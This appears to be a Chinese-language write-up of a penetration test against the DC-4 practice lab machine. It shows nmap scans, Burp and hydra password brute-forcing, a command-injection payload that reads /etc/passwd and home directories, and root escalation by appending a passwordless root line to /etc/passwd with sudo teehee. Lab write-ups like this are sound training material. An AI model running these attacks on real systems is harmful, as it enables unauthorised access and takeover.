目录
DC-4靶机渗透测试
DC-4对于我们来说同样是黑盒测试
DC-4靶机MAC地址:00:0C:29:86:67:2E
kali2021:192.168.3.222/24
信息收集
1、由DC-4的mac地址获取ip
nmap -sP 192.168.3.1/24 -oN nmap.sP 得知DC-4的IP为192.168.3.145
2、扫描主机所开放的端口
nmap -A 192.168.3.145 -p 1-65535 -oN nmap.A (得知目标开放了22端口和80端口,并且80端口使用的web容器是nginx,22端口所用组件是openSSH 7.4)
3、通过浏览器去访问80端口
提示可用admin来登录,尝试做爆破
web渗透
1、密码爆破
上面提示用户名为admin,尝试使用hydra来密码爆破
这里演示用burp suite进行爆破:
把抓到的包放到intruder模块,做爆破!
这个爆破的密码字典在哪?来到kali里面
密码字典在/usr/share/john目录下有一个password.lst,用finalshell下载到本地
来到intruder模块,clear $,爆破的是密码,把密码Add $,来到payloads,把字典载入
可以点击attack进行爆破,爆破之前点击options,选择线程(给500),start Attack(社区版好像不让设置线程),爆破后得知密码是happy
利用密码登录网站
2、后台操作
登录后台后发现命令执行
接下来我们抓一下包,看看命令是怎么执行的
将包发送到repeater模块
这里ls -l就可以执行一些系统命令了,可以把这些命令换成别的,换成whoami,发现能够执行
这样就可以判断这里存在命令注入漏洞!
接下来:radio=cat+/etc/passwd,发现了charles,jim,sam这三个用户,并且都存在家目录
我们查看一下家目录中的文件:radio=ls+-al+/home
依次看看那三个用户的家目录:ls -al /home/charles,一个一个看
发现在Charles中没有特殊的文件,jim中有
我们看看backups命目录下面有什么,看到一个旧密码备份文件,我们看一下
将这些密码复制到kali 创建密码字典
再创建一个用户字典,把那三个用户写进去
已经有用户名,密码,并且开放了22端口,尝试爆破(hydra)
hydra -L user.dic -P old-passwords.bak ssh://192.168.3.145 -vV -o hydra.ssh
找到了用户名和密码,尝试登陆(jim | jibril04)
cd /var/mail
cat jim
发现Charles直接把密码发给jim了,Password is: ^xHhA&hvim0y
尝试登陆ssh
ssh charles@192.168.3.145
查看可以不需要密码就可以使用root权限执行的命令(guid)
sudo -l
看一下charles用户能不能sudo
发现teehee这个命令在执行期间不需要输入root用户密码
teehee --help
查看帮助信息,这条命令可以在任意文件的最后追加命令
在passwd 文件末尾追加
sudo teehee -a /etc/passwd
waffle::0:0:::/bin/bash
或者 echo "waffle::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
cat /etc/passwd
尝试ssh登陆:
ssh waffle@192.168.3.145
不过不知道我的出了什么问题导致无法这样创建一个免密的root账号,每次都会叫我输入密码,不过看网上的大部分人都成功了,就还是记录上去
获得root权限后去/root目录下查看flag